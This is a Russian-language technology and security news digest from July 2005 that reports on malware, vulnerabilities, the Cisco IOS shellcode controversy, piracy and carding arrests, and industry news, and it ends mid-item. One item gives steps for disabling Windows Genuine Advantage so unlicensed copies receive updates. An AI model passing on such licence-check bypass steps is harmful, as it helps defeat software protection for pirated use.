Источник

31/07/2005 11:32 Бесплатный хостинг — рассадник вирусов
Согласно последнему исследованию, сервисы бесплатного хостинга в массе своей превращаются в файлохранилище для хакеров. Согласно отчету компании Websense, специализирующейся на сетевой безопасности, случаи размещения вредоносных кодов на сайтах в зоне бесплатного хостинга резко пошли вверх. Как передает ZDNet, этот тренд стал особенно выраженным в первые две недели июля. На бесплатных хостингах в огромном количестве стали создаваться сайты с размещенными на них троянцами, кейлоггерами и spyware-программами. Как утверждает Дэн Хаббард (Dan Hubbard), директор по безопасности и технологическим разработкам компании Websense, несмотря на то, что такие сайты считаются нелегальными, они создаются на очень короткий срок, так что выявить их и вовремя пресечь преступную деятельность чаще всего не представляется возможным. «Обычно жизнь таких сайтов длится 2–4 дня, — рассказывает мистер Хаббард. — Поэтому своевременно отследить их появление практически невозможно. Некоторые такие сайты вообще создаются в автоматическом режиме — десятками и сотнями». Точку зрения Хаббарда корректирует аналитик компании Frost & Sullivan Australia — Джеймс Тернер (James Turner). По его мнению, реальная опасность исходит и будет исходить от компьютеров зомби, а сайты-файлохранилища — это опасность второго эшелона. «Конечно, бесплатные сайты с размещенными на них вирусами — это серьезная угроза. Однако, на мой взгляд, если хакер заразит 10 000 компьютеров, они с успехом заменят ему зараженные сайты, и при этом ему не придется регистрироваться на сервисах бесплатного хостинга».
Источник

31/07/2005 11:10 В антивирусе Sophos найдена уязвимость
Компания Sophos признала наличие уязвимости в своем флагманском антивирусном продукте и сообщила, что работает над созданием соответствующего патча. Уязвимость в Sophos Anti-Virus позволяет злоумышленникам производить атаки с переполнением буфера. «Дыру» обнаружил Алекс Вилер (Alex Wheeler). Патч уже создан для Antivirus 4.5.4 и 3.96.0., для Sophos Anti-Virus Small Business Edition выйдет сегодня, а для остальных уязвимых продуктов — в течение ближайших двух недель. Ранее в продуктах таких компаний по информационной безопасности, как Symantec, McAfee, Trend Micro и F-Secure, также находили уязвимости.
Источник

31/07/2005 09:37 Умер основатель российского интернета
23 июля 2005 г. на 48-ом году жизни скоропостижно скончался основатель и бессменный руководитель группы компаний „Демос“ Сергей Петрович Бородько, которого можно по праву считать основателем российского интернета. Ровно четверть века назад, после окончания МИФИ, он пришел в Курчатовский институт, где прошел путь от рядового инженера до начальника службы автоматизации физического эксперимента. До последнего дня Сергей оставался сотрудником института. Сергей Бородько обладал уникальным даром объединять вокруг себя, зажигать людей новыми идеями, щедро делился с окружающими своей потрясающей энергией. Он менял жизнь всех, с кем соприкасался. В 1989 году он стал одним из организаторов и лидером кооператива „Демос", ставшего для него формой существования всей дальнейшей жизни. Сергей Бородько оказался не только ученым, но и талантливым бизнесменом: сумел превратить маленький научный кооператив в одну из ведущих компаний российского ИТ-рынка. Благодаря Сергею Петровичу в 1990 году в нашей, тогда еще советской стране, появился интернет, развитие которого неразрывно связано с его именем.
CNews

31/07/2005 09:15 Computer Associates приобрела антиспамерского разработчика
Разработчик программного обеспечения для корпоративных клиентов Computer Associates приобрел за наличные компанию Qurb, создавшую собственный антиспамперский продукт, сообщает сайт vnunet.com. Computer Associates прежде использовала разработку Qurb, однако теперь собирается изменить название антиспамерского бренда и включить его в состав программного комплекса eTrust Threat Management. В новой версии продукт Qurb будет называться eTrust Anti-Spam. Антиспамерский фильтр Qurb является десктопным приложением. Принцип работы фильтра основан на создании белых списков отправителей писем. Программа просматривает письма от неизвестных адресатов и сообщает пользователю о том, что часть этих писем, возможно, принята за спам по ошибке. Приобретая Qurb, Computer Associates намеревается укрепить свои позиции на рынке потребителей из малого и среднего бизнеса. Незадолго до сделки с Qurb Computer Associates приобрела разработчика межсетевых экранов Tiny Software.
Подробности

31/07/2005 09:02 К докладу об уязвимостях в продуктах CISCO
Ранее мы писали, что Майкл Лиин, бывший сотрудник ISS, опубликовал доклад “The Holy Grail: Cisco IOS Shellcode and Remote Execution”. Линн рассказал, как можно атаковать Cisco Internetwork Operating System, используя известное слабое звено в защите IOS. Это ПО работает на маршрутизаторах Cisco, на которые опирается инфраструктура интернета. Широкая атака может серьезно повредить интернету, сказал он. Благодаря сайту Securitylab, вы можете ознакомиться с этим докладом.
Доклад в формате PDF

30/07/2005 15:25 Microsoft: как обойти защиту от загрузки обновлений
Как известно, недавно корпорация Microsoft ввела механизм ввела обязательную проверку подлинности вашей копии Windows при загрузке обновлений для операционной системы и приложений, а также некоторых бесплатных программ. Исключение в системе Windows Genuine Advantage было сделано только для критически важных обновлений - чтобы пиратские копии Windows во всем мире не стали рассадником различных вирусов. Владельцев нелицензионных копий Windows у нас абсолютное большинство, поэтому на территории бывшего СССР подобная новость особенно актуальна и печальна для конечных пользователей. Но не успели "пираты" огорчиться, как пришло решение проблемы. Как сообщается на сайте overclockers.ru, Один из читателей, пожелавший остаться неизвестным, прислал простой до примитивизма и вполне работоспособный способ обхода новоявленной "защиты". Для доступна к обновлениям требуется сначала загрузить специальную утилиту от Microsoft, проверяющая вашу систему на наличие лицензии. Выполнив необходимые операции по ее загрузке открываем Internet Explorer и переходим к меню "Сервис" -> "Свойства обозревателя", на вкладке "Программы" нажимаем кнопку "Надстройки". В открывшемся окне ищем необходимый элемент Active X с говорящим за себя названием "Windows Genuine Advantage" и отключаем его. Более подробно можно прочитать , посетив ссылку, приведённую ниже.
Подробности

30/07/2005 12:50 Беты Internet Explorer 7 и Windows Vista утекли в интернет
Первый этап бета-тестрирования операционной системы Windows Vista и браузера Internet Explorer 7 оказался не совсем закрытым. Напомним, что на днях Microsoft начала распространять бета-версии своих новых продуктов среди избранных тестеров числом около 10000 человек. Публичное тестирование в случае Windows Vista должно начаться только в 2006 году после выхода второй бета-версии. Однако, по сообщению сайта BetaNews, при желании и Windows Vista, и Internet Explorer 7 для Windows XP можно найти в интернете. Кто-то из первых бета-тестеров оказался человеком ненадежным, и копии дистрибутивов новейших продуктов Microsoft начали расползаться по варезным сайтам, IRC-каналам и файлообменным сетям. Остановить этот процесс уже никому не под силу. Впрочем, перед многими желающими скачать бета-версию Windows Vista стоит серьезное препятствие. Дело в том, что дистрибутив этой операционной системы занимает 2,5 Гб. То есть даже у обладателей быстрых каналов скачивание займет достаточно продолжительное время. В случае IE 7 таких проблем не возникнет - дистрибутив нового браузера в варианте для Windows XP занимает около 10 Мб. Однако при установке IE7 придется пройти проверку на подлинность операционной системы в рамках программы Windows Genuine Advantage. А при установке беты Windows Vista нужно проходить процедуру активации, которая, по данным, BetaNews не претерпела изменений по сравнению с Windows XP.
Подробность

30/07/2005 11:48 Mozilla выпустила ознакомительную версию Minimo
Minimo 0.007 – это мобильный браузер, предназначенный для карманных компьютеров и смартфонов, работающих на платформе Windows CE. Поскольку Minimo – плоть от плоти настольного браузера Firefox, он поддерживает почти такой же развернутый набор функций, вроде многооконного интерфейса и поддержки плагинов. Кроме того, как пишет TechWeb, графический интерфейс программы также написан на языке XUL (eXtensible User interface Language – подмножество XML), что позволяет значительно упростить адаптацию внешней оболочки программы под жесткие требования, предъявляемые маленькими экранами мобильных устройств. Представители Mozilla Foundation пока затрудняются назвать хотя бы приблизительную дату релиза финальной версии программы.
Источник

30/07/2005 10:45 Microsoft усиливает борьбу с Linux
Официальные лица Microsoft объявили об интенсификации усилий, направленных на вытеснение операционной системы Linux с рынка. Проводимую с 2003 года кампанию Get the Facts, пропагандирующую преимущества Windows перед Linux, планируется расширить, начав осуществлять маркетинг Windows в качестве операционной системы для определенных типов рабочей нагрузки: Web-серверы, высокопроизводительные вычисления и краевые серверы. В Microsoft рассчитывают, что в результате Windows сумеет вытеснить операционную систему с открытым кодом в тех областях, где она применяется наиболее широко. Недавно также было объявлено о том, что в головном офисе Microsoft уже около полутора лет действует лаборатория Open Source/Linux, где специалисты корпорации тестируют ПО ее разработки совместно с Linux и другими технологиями с открытым кодом, улучшая их интероперабельность с коммерческими программными продуктами.
"Открытые системы"

30/07/2005 10:23 Арестованным в США членам "пиратской верхушки" предъявлены обвинения
ФБР США предъявило обвинения 8 лицам, подозреваемым в организации масштабного пиратского бизнеса. Они были арестованы накануне в США в ходе крупных операций американских спецслужб FastLink и Site Down, в которых также принимали участие правоохранительные органы 15 стран. Как утверждает Министерство юстиции США, эти люди несут ответственность за масштабные хищения интеллектуальной собственности - фильмов, музыки, игр и программ, которые они незаконно копировали и выкладывали для свободного доступа в Интернет, главным образом, в файлообменные сети. Для этого была организована специальная подпольная база в штате Северная Каролина. Власти США утверждают, что задержанные являлись "верхушкой" пиратской сети, ответственной за большое число хищений защищенных авторским правом продуктов и преобразование их, частности, в так называемый "варез" (warez) - пакеты взломанного ПО, распространяемые по "теневым" каналам. Производством пиратских "релизов" занимаются специальные группы, ранее сообщалось, что объектами преследования спецслужб и международной полиции стали известные в пиратской среде группы RiSCISO, Myth, TDA, LND, Goodfellaz, Hoodlum, Vengeance, Centropy, Wasted Time, Paranoid, Corrupt, Gamerz, AdmitONE, Hellbound, KGS, BBX, KHG, NOX, NFR, CDZ, TUN и BHP.
Источник

30/07/2005 10:09 Cisco дала отпор исследователю уязвимостей
Компания Cisco Systems прибегла к судебным мерам, чтобы удержать эксперта от дальнейшего распространения информации о том, как взломать программное обеспечение маршрутизатора компании. В среду сетевой гигант и компания Internet Security Systems подали совместное ходатайство о временном судебном запрете против Майкла Линна и организаторов конференции по безопасности Black Hat. Эта мера последовала после того, как Линн продемонстрировал презентацию, посвященную способу взлома маршрутизаторов Cisco — по его словам, эта проблема способна поставить на колени интернет. В иске, поданном в Окружной суд Северного округа Калифорнии, истцы просят запретить Линну и Black Hat «дальнейшее раскрытие принадлежащей Cisco и ISS секретной информации», сообщил представитель Cisco Джон Ноу (John Noh). «Мы уверены, что информация, которую Линн представил на Black Hat сегодня утром, была добыта нелегально и нарушает наши права интеллектуальной собственности», — сказал он. Линн декомпилировал программное обеспечение Cisco для исследовательских целей и тем самым нарушил права компании, пояснил Ноу. Юридические действия последовали в среду днем, через считанные часы после выступления Линна. Он сообщил аудитории на конференции в Лас-Вегасе, что ради этой презентации он оставил свою работу исследователя в ISS — после того как ISS решила отменить семинар. Сведения об уязвимости и доклад «The Holy Grail: Cisco IOS Shellcode and Remote Execution» были изъяты из трудов конференции, так что в толстой книге осталось пустое место. Линн рассказал, как можно атаковать Cisco Internetwork Operating System, используя известное слабое звено в защите IOS. Это ПО работает на маршрутизаторах Cisco, на которые опирается инфраструктура интернета. Широкая атака может серьезно повредить интернету, сказал он. По словам экспертов, участвующих в конференции Black Hat, о самой уязвимости, которую Линн использует для атаки, Cisco было известно, и она включила соответствующую поправку в недавние версии IOS. Главный технолог ISS Крис Роуланд рассказал в интервью, что в понедельник группа исследователей ISS, куда входит Линн, решила отменить презентацию. «Она еще не готова», — пояснил он. Однако в среду утром Линн порвал с ISS и все равно провел презентацию. По словам Роуланда, Линн представил исследование ISS, уже не будучи сотрудником компании. Источник, близкий к организации Black Hat, утверждает, что отмены презентации добивалась Cisco. По его словам, Линна попросили прочесть другой доклад, о безопасности технологии Voice over Internet Protocol. Однако Роуланд говорит, что «ни о какой презентации по VoIP речь не шла», и что семинар в среду вообще должен был быть отменен. «Это очень важное исследование, и лежащая в его основе работа тоже чрезвычайно важна, но мы должны были вместе с Cisco как следует изучить все последствия», — сказал он. Источник, близкий к Cisco, сообщил, что компания принимала участие в отмене презентации. Сетевой гигант провел совещание с ISS, и они вместе решили, что исследование еще не готово. В презентации описывалась атака на непосредственно подключенный маршрутизатор, а не дистанционная атака через интернет. «Вы можете взломать свой собственный маршрутизатор, но не удаленный», — пояснил Роуланд. Однако на специалиста по безопасности Даррила Тейлора, участника Black Hat, презентация Линна произвела впечатление. «Он действительно легко вскрывает оболочку (shell) и показал, как это сделать. Многие говорили, что это невозможно, а он сел и сделал».
Подробности

30/07/2005 09:06 В Нидерландах и США проходят хакерские конференции
В Нидерландах открылась конференция по компьютерной безопасности "What The Hack", которая проходит под открытым небом на поле вблизи города Бокстель. По сути, мероприятие является собранием хакеров, которые обсуждают друг с другом аспекты своей деятельности в разных сферах информационной безопасности. Слет, который проводится раз в четыре года, организован в стиле рок-фестиваля - участники живут в палатках и ходят друг другу в гости, периодически собираясь на "полянках" для выслушивания докладчиков. Власти Бокстеля изначально хотели не допустить проведения мероприятия, однако организаторам удалось с ними договориться. Как отмечает агентство AP, в этом году хакеры проявляют заинтересованность "общесоциальными" вопросами, обсуждая "мирные" области применения своих знаний, в некоторых обсуждениях участвуют даже местные полицейские, которые дают консультации по применению высоких технологий в области охраны правопорядка. Конференция началась в четверг и должна продлиться три дня. В пятницу, в американском Лас-Вегасе, в свою очередь, должна начаться другая конференция по цифровой безопасности, также известная обилием участвующих в ней хакеров - знаменитая DefCon, которая считается центральным ежегодным мероприятием для специалистов в этой сфере.
Подробности

26/07/2005 13:07 SMTP Path Analysis - новый метод борьбы со спамом
Специалисты IBM и Корнелльского университета разрабатывают новый способ фильтрации спама. В основе его лежит анализ протокола SMTP и путей, по которым шло письмо. Методика SMTP Path Analysis предусматривает исследование содержащейся в заголовке (header) письма информации о том, через какие серверы шло сообщение. Таким образом, можно попытаться отследить первоисточник. Алгоритм SMTP Path Analysis сравнивает между собой маршруты обычных почтовых сообщений и спама, и, основываясь на этих данных, пытается отделить зёрна от плевел. Факт, однако, заключается в том, что спамеры часто фальсифицируют адреса серверов исходящей почты. Чтобы противодействовать этому, разработан ещё один алгоритм, который сверяет правдоподобие маршрута письма, опираясь на IP-информацию из нескольких разных источников. Сами разработчики считают, что данный алгоритм недостаточно точен, чтобы использовать только его для фильтрации спама, однако в комбинациях с другими фильтрами он показывает довольно неплохие результаты.
SecurityLab

26/07/2005 12:32 Япония намерена создать самый мощный суперкомпьютер
Министерство образования, культуры, спорта, науки и технологии Японии объявило о планах по постройке к 2010 году самого мощного суперкомпьютера. По заявлению представителей министерства, мощность суперкомпьютера составит 10 петафлопс (1015 операций с плавающей точкой в секунду), что в 73 раза быстрее, чем мощность самого быстрого на сегодняшний день американского суперкомпьютера Blue Gene/L, построенного компанией IBM. Создание нового японского суперкомпьютера обойдется японской казне в 80-100 миллиардов иен (около 900 млн. долларов США). Новый суперкомпьютер будет использоваться для моделирования процессов формирования галактик, прогнозирования движения тайфунов и разработки новых лекарственных средств.
РИА "Новости"

26/07/2005 11:37 Symantec: "Вирусописатели меняют тактику!"
Антивирусная компания Symantec объявила, что количество деструктивных вирусов в интернете пошло на резкий спад. Это, впрочем, не означает, что Сеть становится безопаснее. Просто на смену "вирусам-погромщикам" пришли "тихие сапы", вирусы, ворующие персональную информацию или подсовывающие на заражённые компьютеры непрошенную рекламу. Вирусописатели, считают в Symantec, теперь гоняются не столько за славой, какой бы сомнительной она ни была, сколько за деньгами. В прошлом году Symantec зарегистрировал 33 вируса, коим были присвоены третья и четвёртая степени опасности (всего таких степеней, или категорий, пять, но последняя никогда ещё не использовалась - в Symantec шутят, что эту оценку берегут на случай светопреставления). К таковым относились Blaster и Sasser. В этом году были зарегистрированы лишь два вируса третьей-четвёртой категорий, зато отмечен резкий рост вредоносных программ второй категории опасности, в основном, троянов. Подсадив на чужой компьютер трояна и вытянув оттуда номер кредитной карты или пароль к банковскому счёту, вирусописатели продают добытую информацию заинтересованным лицам. Кроме того, с помощью троянов можно обеспечить дармовой хостинг малосолидному веб-ресурсу или скрытому почтовому серверу, через который будет рассылаться спам. Ну и, наконец, с помощью троянов по компьютерам с выделенными подключениями к Сети рассаживаются удалённо управляемые "жучки" для проведения DoS-атак. Сети, состоящие из заражённых компьютеров, как известно, стали среди хакеров расхожим товаром. Кроме того, некоторые трояны используются исключительно для "подсовывания" на заражённый компьютер непрошенной рекламы, за которую, очевидно, "рекламодатели" хорошо платят.
Подробности

26/07/2005 11:08 Microsoft критикуют за патентование смайликов
Разные организации критикуют Microsoft за попытку запатентовать в США способ воспроизведения эмограмм, называя этот прецедент «чрезвычайно опасным». Патент, опубликованный в четверг Патентным бюро США, относится к способу выбора пикселей для создания изображений значков, выражающих эмоции, присвоения этим пикселам последовательности символов и воспроизведения значков эмоций после передачи. Марк Тейлор, исполнительный директор организации Open Source Consortium, заявил, что это настолько простая концепция, что он не удивился бы, увидев ее опубликованной в качестве пародии на патент на технологическом сайте. «Нечто подобное можно ожидать в виде шутки на Slashdot от одного из самых зеленых членов нашего сообщества, и его, скорее всего, высмеяли бы за абсурдность. Похоже, что мы живем в мире, где даже самые смехотворные фантазии параноика по поводу коммерческого управления простыми способами общения внедряются в жизнь армией хорошо оплачиваемых юристов по поручению некоторых самых влиятельных компаний на планете». По словам Тейлора, с выдачей этого патента могут возникнуть трудности, так как он относится к основам человеческих взаимоотношений. «Эмограммы — это форма языка, и такой прецедент позволит патентовать языковые конструкции, что очень опасно», — отметил Тейлор. Йонас Мебе, представитель организации Foundation for a Free Information Infrastructure (FFII), считает, что Microsoft сможет использовать этот патент для того, чтобы помешать конкурентам разрабатывать приложения, конкурирующие с MSN Messenger. «Совершенно понятно, что такие патенты не имеют никакого отношения к защите инвестиций или исследованиям и разработкам, а просто дают исключительные права, которые могут помочь им [Microsoft] сохранять свое доминирующее положение на рынке». Коллега Мебе из FFII Филипп Версен добавляет, что такие патенты противоречат первоначальной цели патентной системы. «Патенты должны работать на благо общества — чтобы компании обнародовали полезные идеи, которые иначе они бы скрывали. А чем полезен данный патент?»
Подробности

26/07/2005 10:45 Хакерам будут платить за поиск "дыр"
Компания Tipping Point - подразделение 3Com, специализирующееся на компьютерной безопасности, - разработала систему вознаграждений, в рамках которой компьютерные специалисты (в том числе хакеры) смогут получать деньги за поиск уязвимостей в программах различных производителей. Система получила название Zero Day Initiative, она будет официально представлена на конференции Black Hat в Лас-Вегасе, которая пройдет 27 и 28 июля. Предполагается, что в системе будут регистрироваться компании, желающие проверить свои продукты, и квалифицированные специалисты, которые будут заниматься непосредственно тестированием. Производители будут отчислять средства, которые будут распределяться между тестерами. В самом разнообразном программном обеспечении регулярно находятся "дыры", которые теоретически могут позволить использовать "уязвимую" программу для своершения деструктивных действий. Производители ПО обычно заинтересованы в том, чтобы кто-либо занимался поиском "дыр", но по факту нахождения извещал авторов программы, а не создавал вредоносные модули. Авторы Zero Day Initiative утверждают, что наиболее активные и "эффективные" тестеры смогут зарабатывать с ее помощью до 50 тысяч долларов в год. Как отмечает BBC News, это не первая инициатива подобного рода - деньги за поиск добровольцами уязвимостей предлагает компания iDefense, а также создатель браузера Firefox, организация Mozilla Foundation.
Сайт проекта

26/07/2005 10:14 Microsoft объяснила название Windows Vista
Microsoft объявила о дате выхода первой бета-версии ее новой операционной системы Windows Vista, ранее известной под рабочим названием Longhorn. В поступившем в редакцию "Ленты.Ру" пресс-релизе корпорации говорится: "Первая бета-версия, предназначенная для разработчиков и ИТ-профессионалов, появится 3 августа 2005 года. В нее включены все разработанные на сегодняшний день технические возможности и наглядно представлены основы новой архитектуры системы. Первая бета-версия выпускается для того, чтобы у ИТ-аудиторий сложилось первое впечатление о новой операционной системе. В соответствии с результатами первого этапа бета-тестирования будут доработаны пользовательские функции системы, которые затем будут представлены во второй бета-версии. Характеристики и возможности финальной версии Windows Vista, выход которой запланирован на 2006 год, в значительной степени зависят от собранных после выхода бета-версий отзывов, комментариев и предложений". Кроме того, компания поясняет выбранное название для новой системы: "По мнению создателей Windows Vista, ее название достаточно точно отражает те преимущества, которые новая операционная система дает пользователям. В переводе на русский язык "vista" означает "новые возможности", "открывающиеся перспективы". Windows Vista является продуктом, который будет использоваться по всему миру миллионами людей с разными знаниями, жизненным опытом и мироощущением. И новый бренд подчеркивает широкое, глобальное применение ОС.Название новой ОС выбиралось тщательно и последовательно. Первоначально в результате проведенных исследований, название было определено и одобрено сотрудниками Microsoft. После этого "Vista" было протестировано в нескольких регионах мира методом фокус-групп и "глубинных" интервью. Большинство из опрошенных респондентов посчитали, что именно Windows Vista соответствует тем значительным изменениям, которые были привнесены в новую операционную систему", - сообщается в документе.
Источник

26/07/2005 09:53 Глава "Центра английского разговорного языка" перед смертью активно сопротивлялся
Следствие предполагает, что убитый накануне гражданин Армении Вардан Кушнир, возглавлявший "Центр английского разговорного языка", пытался оказать преступнику сопротивление, сообщает РИА "Новости". Об этом свидетельствует тот факт, что вещи, одежда в квартире были разбросаны, на некоторых из них видны следы крови. "Накануне в одной из квартир дома 20 на Садовой-Каретной улице было обнаружено тело 35-летнего Вардана Кушнира. По данным экспертизы, его смерть наступила в субботу в результате черепно-мозговой травмы", - сказал представитель прокуратуры. Кроме того, погибший получил множественные ушибленные раны головы. Он добавил, что возбуждено уголовное дело по статье 105 УК РФ (убийство). Пока неизвестно, было ли что-то похищено из квартиры, которую снимал Кушнир. Обстоятельства происшествия выясняются. Возможные версии убийства в прокуратуре пока комментировать отказываются. "Центр английского разговорного языка" ранее носил название "Центр американского английского". Эта организация широко известна в российском Интернете активным применением недобросовестных методов ведения бизнеса - прежде всего спамерских рассылок. Год назад деятельность Кушнира и его предприятия привлекла внимание Министерства по антимонопольной политике, однако остановить спамерскую деятельность центра не удалось.
РИА "Новости"

23/07/2005 14:24 Microsoft продолжает свою стратегию против OpenSource
Мартин Тэйлор, главный менеджер корпорации Microsoft по развитию стратегии платформы, продолжает словесную атаку в средствах массовой информации против Open Source в целом и Linux в частности. В одном из последних интервью CNET, Мартин Тэйлор заявил, что в бизнесе, где применяется Linux, равно как и другие OpenSource системы, люди начинают осознавать, что они вкладывают намного больше средств в открытые технологии, чем предполагали в начале. Согласно Тэйлору, Linux - неподходящая система: Вы можете собрать ее, совершенствовать, и она будет работать прекрасно. Проблемы возникают после того, как вы решите что-то в нее добавить, например новые сервисы или еще что-нибудь подобное. Все по причине того, что OpenSource, по природе своей, хрупкая платформа. Если вы делаете подобные вещи – система рушится. Мы постоянно наблюдаем это в своих лабораториях, а также это видят наши клиенты.
Подробности

23/07/2005 12:53 Safe’n’Sec Business защитит от эпидемий и хакеров
Продукт Safe’n’Sec Business официально внесен в продуктовую линейку компании и представлен в каталогах Интернет-магазинов партнеров StarForce, входящих в дистрибуторскую сеть Safe’n’Sec. В семействе Safe’n’Sec Business представлено два решения: базовый комплект Safe’n’Sec Business и Safe’n’Sec Business плюс Антивирус, дополненный возможностью поиска вредоносного кода. Safe’n’Sec Business будет противостоять вирусным эпидемиям, хакерским атакам, шпионским утилитам и попыткам несанкционированного доступа в систему. "Ключевым преимуществом Safe’n’Sec Business остается принцип предотвращения любых вредоносных действий на основе анализа поведения приложений", - сообщается в пресс-релизе. При попытке выполнения несанкционированного или потенциально опасного действия администратор получит соответствующее уведомление, содержащее информацию об очаге вредоносной активности. Статистические данные о срабатываниях хранятся в текстовых файлах и позволяют выявить слабые места в системе защиты информации предприятий и устранить уязвимости. Консоль централизованного управления системой Safe’n’Sec Admin Explorer не требует инсталляции и имеет знакомый всем пользователям Windows XP привычный интерфейс управления. Safe’n’Sec бесконфликтно функционирует на любой рабочей станции, вне зависимости от специфики отраслевого программного обеспечения предприятия.
Internet.Ru

23/07/2005 12:39 В США многие владельцы обычных телефонов думают о полном переходе на беспроводную связь
Последнее исследование, проведённое организацией NCL (National Consumers League, Национальная Лига Потребителей), выявило, что многие взрослые американцы используют широкий спектр коммуникационных услуг, легко примут новые технологии в будущем и даже готовы перейти на полностью беспроводную коммуникацию. Оказалось, что 39% взрослых, пользующихся стационарными телефонными сетями, всерьёз рассматривают возможность перейти в течение двух следующих лет на беспроводную связь, в том числе и дома. При этом 46% тех, кто слышал о существовании VoIP, подумывают начать использовать эту технологию вместо традиционных стационарных сетей. Кроме того, исследование выявило интересную закономерность по поводу использования различных сервисов. NCL прямо призывает обратить внимание на то, что цена сервисов частенько оказывается решающим фактором для того, чтобы не начинать ими пользоваться. В качестве примера, исследователи приводят такую статистику: 65% взрослых, чей годовой доход превышает 100 тысяч долларов, имеют высокоскоростное подключение к интернету. С другой стороны, всего 14% тех, кто получает менее 25 тысяч долларов в год, могут позволить себе эту "роскошь". При этом 35% использующих обычные модемы для доступа в интернет, называют именно высокую стоимость в качестве причины того, что они не имеют высокоскоростной линии. Кто знает, может провайдеры и прислушаются к призыву, подкреплённому цифрами.
Источник

23/07/2005 11:55 ксперт по IT-безопасности упрекнул Oracle в беспечности
Oracle не заинтересована в том, чтобы устранять сбои в работе своих продуктов и выпускать для них обновления. Такое заявление сделал эксперт по информационной безопасности компании Red Database Security Александр Корнбраст (Alexander Kornbrust). «Если вы полагаете, что нуждаетесь в обновлении от Oracle, вам нужно обращаться в Oracle», — приводит слова Корнбраста сайт Vnunet.com. По данным Red Database Security, обновления для некоторых уязвимостей в продуктах Oracle должны были быть выпущены два года назад. Уязвимости, в частности, обнаружены в Oracle Forms и Oracle Reports, входящих в состав серверов приложений и наборов разработчика Oracle 9i и 10g. Датская компания Secunia, занимающаяся исследованиями в области информационной безопасности, оценивает уязвимости Oracle как умеренно критические (3 балла по 5-бальной шкале). По меньшей мере, одна из уязвимостей позволяет хакерам установить контроль над системой, работающей под управлением Oracle. Представители Red Database Security утверждают, что направили в Oracle письмо-напоминание об уязвимостях 15 апреля. Эксперты Red Database пообещали опубликовать детальную информацию об уязвимостях, если компания не выпустит патчи для них до июля. Разработчики СУБД никакой информации о патчах не опубликовали, и Корнбраст в итоге выполнил свое обещание. Пресс-секретарь Oracle заявил, что компания реагирует на обнаружение уязвимостей в своих продуктах «так быстро, насколько это возможно» и отметил, что Корнбрасту было бы лучше подождать.
Источник

23/07/2005 11:20 VIP-персоны ИТ считают, что будущее за open source
В четверг группа высокопоставленных представителей отрасли пыталась понять, придет ли мир в конечном итоге к open source как к средству удовлетворения своих потребностей в программном обеспечении, и преобладающим мнением было: «да». Несколько топ-менеджеров, принявших участие в саммите AO 2005 Innovation Summit в Стэнфордском университете, пришли к заключению, что в ближайшие пять-десять лет движение open source преобразит бизнес программного обеспечения. «Мы строим в софтверной индустрии совершенно новый мир», — сказал Рей Лейн (Ray Lane), партнер специализирующейся на венчурном капитале фирмы Kleiner Perkins Caufield &Byers, который вел круглый стол по open source. Ким Поулз (Kim Polese), генеральный директор SpikeSource, выразила уверенность в том, что в ближайшие годы каждое приложение, относящееся к проприетарным технологиям, станет инструментом open source. Ее компания предлагает интегрированный пакет взаимодействующих, оттестированных программ для директоров по информационным технологиям. На вопрос Лейна, станут ли, по ее мнению, компании платить владельцам open-source инструментов за лицензии, Поулз ответила утвердительно. Она считает, что компании научатся также лучше кооперироваться с конкурентами в области создания и внедрения open-source приложений, работающих на их предприятиях. Другими локомотивами роста популярности ПО open source станут стабильность и безопасность, сказал партнер Morgan Lewis & Bockius Рауль Капур. Это заявление вызвало неоднозначную реакцию со стороны других участников круглого стола: быть может, это ПО кажется более безопасным просто потому, что авторы вирусов обычно нацеливаются на более широкие круги пользователей, типа пользователей Windows?
ZDNet

22/07/2005 14:26 США обеспокоены угрозой хакерских атак с Восточной Европы
В Украине арестован некто Дмитрий Голубов, подозреваемый в причастности к созданию одной из крупнейших криминальных интернет-организаций Carderplanet, которую в прошлом году разгромили американцы. Его можно считать одним из коронованных воров виртуального преступного мира. Троих российских участников интернет-ОПГ уже осудили. Теперь власти США, обеспокоенные участившимися атаками хакеров из Восточной Европы, обратили свой взор на Украину. Преступная сеть Carderplanet.com, в создании которой Голубов якобы принимал активное участие, – частное интернет-сообщество, члены которого занимаются кардингом (carding – мошенничество с использованием украденных карт, банковских или телефонных, либо их номеров). Организация насчитывала около 7 тысяч членов, главным образом – жителей стран СНГ и Восточной Европы. Ведет свою историю с 1997 года, когда основатели сообщества совершили ряд атак на владельцев кредитных карт и интернет-магазины на территории США. В 1997 году также впервые возникло понятие "кардер" (человек, совершающий незаконные действия с банковскими картами) и начала формироваться иерархия кардерской мафии. Кроме хакерских атак и краж с кредитных карточек, "кардерпланетчики" специализировались на торговле краденой информацией о клиентах банков, главным образом, западных. После того как сама сеть была закрыта в результате комплекса мероприятий, спецслужбы США занялись выслеживанием ее организаторов. Причем, искать их начали в России и Украине. И это неслучайно: корни преступного сообщества произрастают из наших краев. Даже основной сайт ОПГ – www.carderplanet.com – содержал главным образом русскоязычные материалы (хотя там был и англоязычный форум). К слову, его пользователи делились на четыре категории, названия которых взяты из книг и фильмов об итальянской мафии: Family (кардеры-ветераны), Capo di capi ("проверенные"), Capo ("заслуживают доверия"), Reviewed Vendours ("незарегистрированные участники форума"). Участник имел возможность размещать здесь "коммерческие объявления", искать партнеров по "бизнесу". В открытой части форума публиковались схемы реализации поддельных кредитных карт, дорожных чеков, обналичивания похищенных средств, рекомендации по поведению на допросе и так далее. По данным западной прессы, Голубов, участвовал в деятельности Carderplanet под псевдонимом Script. Правоохранители утверждают также, что в сообществе, стоявшем за Carderplanet, действовала мощная, хорошо налаженная иерархическая структура. Голубов входил в число главных организаторов сети, в так называемую "семью". То есть относился к высшей из перечисленных выше каст.
Более подробно

22/07/2005 13:28 Через MSN Messenger и AIM распространяется опасный червь
Компания Symantec предупреждает о новой угрозе: через интернет-пейджеры MSN Messenger и AOL Instant Messenger распространяется опасный троян. Программа под названием Kirvo подсылает ничего не подозревающему пользователю сообщение якобы от кого-то из контакт-листа, содержащее ссылку на некий сайт, при переходе по которой на компьютер пользователя закачивается копия Kirvo. Этот троян, в свою очередь, скачивает на диск копию червя под названием Spybot. Стоит отметить, что существует одноимённая - и весьма популярная - программа для борьбы со шпионским софтом и прочей "живностью", какая может завестись у неаккуратного пользователя Сети. В отличие от нее червь Spybot - программа сугубо злонамеренная, предназначенная для шпионажа за пользователем. Антивирусные специалисты отмечают, что Kirvo был, судя по всему, написан как раз для по возможности широчайшего распространения Spybot. Автору последнего принадлежит целая сеть компьютеров-зомби, через которых продолжается распространение червя. Между тем 21 июля Symantec обнаружил ещё одного похожего червя, также распространяющегося через интернет-пейджеры, и носящего (по номенклатуре Symantec) чрезвычайно красноречивое название W32.Opanki.D. Как и Kirvo, он рассылает через AIM ссылки на сайты, с которых скачивается его копия - 